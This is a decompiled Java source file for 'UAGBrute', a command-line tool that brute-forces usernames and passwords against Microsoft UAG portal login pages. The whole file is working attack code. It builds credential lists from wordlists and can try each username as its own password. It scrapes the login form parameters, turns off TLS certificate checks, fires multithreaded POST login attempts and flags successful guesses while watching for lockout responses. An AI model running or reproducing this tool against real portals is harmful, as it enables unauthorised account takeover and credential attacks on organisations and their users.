package se.swende.uag;

import gnu.getopt.Getopt;
import gnu.getopt.LongOpt;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.ProtocolException;
import java.net.URL;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Hashtable;
import java.util.LinkedList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/* loaded from: input_file:se/swende/uag/Brute.class */
public class Brute {
    public static String LOGIN_PARAMETERS = null;
    public static String LOGIN_PAGE_URL = null;
    static boolean DEBUG = false;
    private String baseUrl;
    private static /* synthetic */ int[] $SWITCH_TABLE$se$swende$uag$Brute$LoginResult;

    /* JADX INFO: Access modifiers changed from: package-private */
    /* loaded from: input_file:se/swende/uag/Brute$HTTPResult.class */
    public class HTTPResult {
        public URL redirect;
        public String content;

        public HTTPResult(URL url) {
            this.redirect = url;
        }

        public HTTPResult(String str) {
            this.content = str;
        }
    }

    /* JADX INFO: Access modifiers changed from: package-private */
    /* loaded from: input_file:se/swende/uag/Brute$LoginResult.class */
    public enum LoginResult {
        OK,
        NOT_OK,
        ATTEMPTS_EXCEEDED;

        /* renamed from: values, reason: to resolve conflict with enum method */
        public static LoginResult[] valuesCustom() {
            LoginResult[] valuesCustom = values();
            int length = valuesCustom.length;
            LoginResult[] loginResultArr = new LoginResult[length];
            System.arraycopy(valuesCustom, 0, loginResultArr, 0, length);
            return loginResultArr;
        }
    }

    public Brute(String str) {
        this.baseUrl = str;
    }

    public static void out(String str) {
        System.out.println(" - " + str);
    }

    private static String readContent(InputStream inputStream) {
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
        StringBuilder sb = new StringBuilder();
        while (true) {
            try {
                String readLine = bufferedReader.readLine();
                if (readLine == null) {
                    break;
                }
                sb.append(String.valueOf(readLine) + "\n");
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        return sb.toString();
    }

    private static LoginResult doLogin(URL url, Hashtable<String, String> hashtable, String str, String str2) {
        HttpURLConnection connection = HttpUtils.getConnection(url, hashtable);
        connection.setRequestProperty("Referer", str2);
        try {
            connection.setDoOutput(true);
            connection.setRequestMethod("POST");
            OutputStreamWriter outputStreamWriter = new OutputStreamWriter(connection.getOutputStream());
            outputStreamWriter.write(str);
            outputStreamWriter.close();
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(connection.getInputStream()));
            while (true) {
                String readLine = bufferedReader.readLine();
                if (readLine == null) {
                    break;
                }
                if (connection.getResponseCode() == 200 && readLine.indexOf("Authentication failed.") > 0) {
                    return LoginResult.NOT_OK;
                }
                if (connection.getResponseCode() == 302 && readLine.indexOf("InternalError.asp?error_code=106") > 0) {
                    return LoginResult.ATTEMPTS_EXCEEDED;
                }
            }
        } catch (ProtocolException e) {
            e.printStackTrace();
        } catch (IOException e2) {
            e2.printStackTrace();
        }
        return LoginResult.OK;
    }

    private HTTPResult fetchUrl(URL url, Hashtable<String, String> hashtable) {
        HttpURLConnection connection = HttpUtils.getConnection(url, hashtable);
        try {
            connection.getResponseCode();
            HttpUtils.readCookies(connection, DEBUG, hashtable);
            String headerField = connection.getHeaderField("Location");
            if (headerField != null) {
                try {
                    return new HTTPResult(new URL(url, headerField));
                } catch (MalformedURLException e) {
                    e.printStackTrace();
                    return null;
                }
            }
            try {
                return new HTTPResult(readContent(connection.getInputStream()));
            } catch (IOException e2) {
                e2.printStackTrace();
                return null;
            }
        } catch (IOException e3) {
            e3.printStackTrace();
            return null;
        }
    }

    /* JADX WARN: Failed to find 'out' block for switch in B:34:0x0146. Please report as an issue. */
    public void go(List<Credential> list) throws IOException, NoMoreCredentialsException {
        URL url = new URL(this.baseUrl);
        Hashtable<String, String> hashtable = new Hashtable<>();
        HTTPResult fetchUrl = fetchUrl(url, hashtable);
        int i = 5;
        URL url2 = fetchUrl.redirect;
        while (fetchUrl != null && fetchUrl.redirect != null) {
            int i2 = i;
            i--;
            if (i2 <= 0) {
                break;
            } else {
                fetchUrl = fetchUrl(fetchUrl.redirect, hashtable);
            }
        }
        if (i == 5) {
            System.err.println("Error, the remote server did not redirect us enough! Aborting");
            return;
        }
        if (LOGIN_PAGE_URL == null && fetchUrl.content != null) {
            Matcher matcher = Pattern.compile("sOrigURL\\s*=\\s*\"([^'\"]+)").matcher(fetchUrl.content);
            if (!matcher.find()) {
                System.err.println("Did not find next location!");
                System.err.println(fetchUrl.content);
                System.exit(1);
                return;
            }
            out("Next URL: " + matcher.group(1));
            LOGIN_PAGE_URL = matcher.group(1);
        }
        URL url3 = new URL(LOGIN_PAGE_URL);
        HTTPResult fetchUrl2 = fetchUrl(url3, hashtable);
        String url4 = url3.toString();
        URL url5 = new URL(url2, "Validate.asp");
        if (LOGIN_PARAMETERS == null) {
            out("Parsing page for login parameters");
            LOGIN_PARAMETERS = Parser.parse(fetchUrl2.content);
        }
        boolean z = false;
        int i3 = 2;
        while (!z) {
            int i4 = i3;
            i3--;
            if (i4 <= 0) {
                return;
            }
            try {
                Credential remove = list.remove(0);
                switch ($SWITCH_TABLE$se$swende$uag$Brute$LoginResult()[doLogin(url5, hashtable, LOGIN_PARAMETERS.replace("$user_name", remove.getUn()).replace("$password$", remove.getPw()), url4).ordinal()]) {
                    case LongOpt.REQUIRED_ARGUMENT /* 1 */:
                        out(remove + " may be a winner...");
                    case LongOpt.OPTIONAL_ARGUMENT /* 2 */:
                    default:
                        out(remove + " failed");
                    case 3:
                        z = true;
                        out(remove + " failed");
                }
            } catch (IndexOutOfBoundsException e) {
                throw new NoMoreCredentialsException();
            }
        }
    }

    public static void usage() {
        System.out.println("Usage: java -jar uagbrute.jar [OPTIONS]\nPerforms brute force guessing of accounts in Microsoft UAG portal.\n\nMandatory options:\n   -p <password_file>   File containing passwords\n   -u <username_file>   File containing usernames\n   -t <target>          The target (e.g https://foobar.com:443/)Non-mandatory options:\n   -s                   If present, 'sameas' will be tested: password the same as username\n   -x                   If present, localhost:8080 will be used as proxy\n   -a                   UAGBrute will attempt to parse the login page to determine the specific                         parameters required, but this may fail. If so, you may be better off specifying                        the parameters yourself through this flag.                         Example: -a user_name=$user_name$&password=$password$&repository=FOOBAR&language=en-US&site_name=foobarportal&secure=1&resource_id=2&login_type=2   -d                   Debug flag   -n <num_threads>     Number of threads to use (default 20)\n");
    }

    public static void validateOrExit(boolean z, String str) {
        if (z) {
            return;
        }
        System.err.println(str);
        usage();
        System.exit(1);
    }

    public static void main(String[] strArr) {
        int i = 20;
        boolean z = false;
        String str = null;
        String str2 = null;
        String str3 = null;
        String str4 = null;
        boolean z2 = false;
        Getopt getopt = new Getopt("UAGBrute", strArr, "sdp:u:n:t:a:x?");
        while (true) {
            int i2 = getopt.getopt();
            if (i2 == -1) {
                validateOrExit(str != null, "Error, no password file specified");
                validateOrExit(str2 != null, "Error, no password file specified");
                validateOrExit(str3 != null, "No target specified");
                validateOrExit(str3.startsWith("http"), "Target should start with protocol (http://|https://)");
                if (str4 != null) {
                    validateOrExit(str4.indexOf("$user_name$") > -1, "Error, you need to specify where the username goes, by having $user_name$ in post params");
                    validateOrExit(str4.indexOf("$password$") > -1, "Error, you need to specify where the password goes, by having $password$ in post params");
                }
                LOGIN_PARAMETERS = str4;
                final List synchronizedList = Collections.synchronizedList(new ArrayList());
                try {
                    String[] readLines = GeneralUtilities.readLines(str2);
                    String[] readLines2 = GeneralUtilities.readLines(str);
                    for (String str5 : readLines) {
                        if (z2) {
                            synchronizedList.add(new Credential(str5, str5));
                        }
                        for (String str6 : readLines2) {
                            synchronizedList.add(new Credential(str5, str6));
                        }
                    }
                    validateOrExit(synchronizedList.size() > 0, "No credentials were read!");
                    if (z) {
                        out("Using proxy");
                        System.setProperty("http.proxyHost", "localhost");
                        System.setProperty("http.proxyPort", "8080");
                        System.setProperty("https.proxyHost", "localhost");
                        System.setProperty("https.proxyPort", "8080");
                    }
                    int size = i > synchronizedList.size() ? synchronizedList.size() : i;
                    GeneralUtilities.disableCertChecking();
                    final String str7 = str3;
                    if (str4 == null) {
                        out("Checking target to determine post-params and redirections");
                        try {
                            LinkedList linkedList = new LinkedList();
                            linkedList.add(new Credential("uagbrute", "hello"));
                            new Brute(str7).go(linkedList);
                        } catch (IOException e) {
                            e.printStackTrace();
                            System.exit(1);
                        } catch (NoMoreCredentialsException e2) {
                        }
                        out("Post params : " + LOGIN_PARAMETERS);
                        out("Login page URL : " + LOGIN_PAGE_URL);
                    }
                    out(String.format("Starting %d threads for %d credentials against %s", Integer.valueOf(size), Integer.valueOf(synchronizedList.size()), str3));
                    for (int i3 = 0; i3 < size; i3++) {
                        new Thread(new Runnable() { // from class: se.swende.uag.Brute.1
                            @Override // java.lang.Runnable
                            public void run() {
                                while (true) {
                                    try {
                                        new Brute(str7).go(synchronizedList);
                                    } catch (IOException e3) {
                                        e3.printStackTrace(System.err);
                                        System.err.println("Exiting");
                                        return;
                                    } catch (NoMoreCredentialsException e4) {
                                        return;
                                    }
                                }
                            }
                        }).start();
                    }
                    return;
                } catch (IOException e3) {
                    e3.printStackTrace();
                    return;
                }
            }
            switch (i2) {
                case 63:
                default:
                    usage();
                    System.exit(0);
                    break;
                case 97:
                    str4 = getopt.getOptarg();
                    break;
                case 100:
                    DEBUG = true;
                    break;
                case 110:
                    try {
                        i = Integer.parseInt(getopt.getOptarg());
                        break;
                    } catch (NumberFormatException e4) {
                        System.err.println("Numeric value required for n (num_threads)");
                        System.exit(0);
                        break;
                    }
                case 112:
                    str = getopt.getOptarg();
                    break;
                case 115:
                    z2 = true;
                    break;
                case 116:
                    str3 = getopt.getOptarg();
                    break;
                case 117:
                    str2 = getopt.getOptarg();
                    break;
                case 120:
                    z = true;
                    break;
            }
        }
    }

    static /* synthetic */ int[] $SWITCH_TABLE$se$swende$uag$Brute$LoginResult() {
        int[] iArr = $SWITCH_TABLE$se$swende$uag$Brute$LoginResult;
        if (iArr != null) {
            return iArr;
        }
        int[] iArr2 = new int[LoginResult.valuesCustom().length];
        try {
            iArr2[LoginResult.ATTEMPTS_EXCEEDED.ordinal()] = 3;
        } catch (NoSuchFieldError unused) {
        }
        try {
            iArr2[LoginResult.NOT_OK.ordinal()] = 2;
        } catch (NoSuchFieldError unused2) {
        }
        try {
            iArr2[LoginResult.OK.ordinal()] = 1;
        } catch (NoSuchFieldError unused3) {
        }
        $SWITCH_TABLE$se$swende$uag$Brute$LoginResult = iArr2;
        return iArr2;
    }
}
